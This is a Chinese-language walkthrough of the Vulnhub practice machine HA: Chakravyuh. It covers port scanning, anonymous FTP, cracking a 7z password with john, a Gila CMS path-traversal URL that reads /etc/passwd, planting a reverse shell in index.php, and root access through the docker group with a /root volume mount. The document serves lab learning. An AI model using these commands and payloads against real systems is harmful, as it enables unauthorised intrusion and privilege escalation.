HA: Chakravyuh Vulnhub Walkthrough

靶機連接：

https://www.vulnhub.com/entry/ha-chakravyuh,388/

主機探測掃描：

 

端口掃描：

╰─ nmap -p- -sC -sV 10.10.202.131

 

FTP 匿名訪問

 

下載壓縮文件，解壓縮須要密碼，基本套路一直，須要密碼，接下來就是找解壓密碼的事情了

 

目錄枚舉下

 

 

phpmyadmin 嘗試弱口令密碼爆破未果

phpmyadmin 版本爲4.6.6 無RCE之類的漏洞

那麼嘗試爆破下載的7z格式的壓縮包文件

這裏使用的工具：

https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py

python 7z2ctf.py arjun.7z > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john hash --show
arjun.7z:family

解壓密碼爲：family

解碼獲取的secret.txt的內容爲：

Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=

base64解碼爲：gila:admin@gmail.com:princesa

gila爲一個cms系統，嘗試訪問看看

 

登陸後臺：http://10.10.202.131/gila/admin

admin@gmail.com:princesa

這裏用到的exp https://www.exploit-db.com/exploits/47407

http://10.10.202.131/gila/admin/fm/?f=src../../../../../../../../../etc/passwd

瀏覽到系統目錄文件，嘗試編輯index.php 添加反shell代碼進去，保存，訪問便可彈回shell

 

python -c 'import pty;pty.spawn("/bin/bash")'

提權操做：

find / -perm -u=s -type f 2>/dev/null

find / -perm -g=s -type f 2>/dev/null

cat /etc/crontab

ls -lh /etc/passwd

netstat -tunlp

沒找到可提權的程序，最後發現當前帳戶的屬組是docker組的，你們都知道docker運行基本都是root權限的身份去執行的

docker run -v /root:/mnt -it alpine

此命令的意思是：docker運行一個交互式的Linux系統alpine，掛載系統的/root 目錄到/mnt目錄下，這樣就能夠獲取到root目錄下的文件內容了。或者直接寫root的crontab 等

 

OVER!!